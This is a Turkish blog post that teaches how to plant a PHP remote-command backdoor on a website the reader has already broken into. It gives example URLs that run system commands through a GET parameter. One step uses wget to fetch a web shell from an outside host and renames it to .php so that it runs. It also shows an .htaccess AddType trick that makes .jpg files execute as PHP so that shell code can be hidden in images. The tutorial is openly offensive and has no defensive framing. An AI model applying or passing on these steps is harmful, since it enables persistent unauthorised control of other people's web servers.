İçeriğe geç

Siteye Backdoor Yerleştirmek – RCE (php backdoor)

GET ile istediğimiz işlemi yapabiliriz ister index.php dosyasına ister herhangi bir php dosyasına yerleştirebiliriz.
Peki nasıl oluyor ? – Yazalım hemen.

 

Şimdi geldi kullanmaya arkadaşlar, erişmiş olduğumuz sitede
bir php dosyasının içine yukarıdaki kodları ekliyoruz ve şu şekilde komutlarımızı çalıştırıyoruz
www.siteadi.com/ayar.php?ayar=ls
uname, passwd, wget, curl vs. akla gelebilecek komutları istediğimiz gibi çalıştırabiliriz.
Şimdi istersek txt olarak shell çağıralım
www.siteadi.com/ayar.php?ayar=wget http://www.shellsitesi.com/ornekshell.txt
Şimdi ise çektiğimiz .txt shelli php yapalım, peki neden txt olarak çektik ?
uzaktan direkt olarak php okuyamayız arkadaşlar önce txt olarak çekicez ki
sonrasında aşağıdaki komutumuzla .txt’i .php haline getireceğiz.
www.siteadi.com/ayar.php?ayar=mv ornekshell.txt ayar.php
Bu şekilde shellimizi ayar.php olarak aktif hale getirdik
Yalnız arkadaşlar bu fonksiyonlar disable edilmiş ise işimiz zorlaşacaktır.
o zamanda .htaccess ile .jpg uzantısını php gibi okutarak istediğimizi yapabiliriz
ve dizinde yine backdoor saklayabiliriz.
örnek olarak bir /dizin/ oluşturun içine .htaccess dosyası oluşturun ve içine şunu ekleyin.
AddType application/x-httpd-php .jpg
Şimdi arkadaşlar resim.jpg dosyası oluşturup kaynağına shell kodları ekleyebilirsiniz
resim.jpg yi php olarak çalıştıracak
İşin özü uzaktan komut çalıştıramıyorsak
.htaccess ile yine backdoor yerleştirebiliriz. }
kaynak : https://www.ayarsecurity.com/2018/07/siteye-backdoor-yerlestirmek-rce.html
Tarih:Backdoor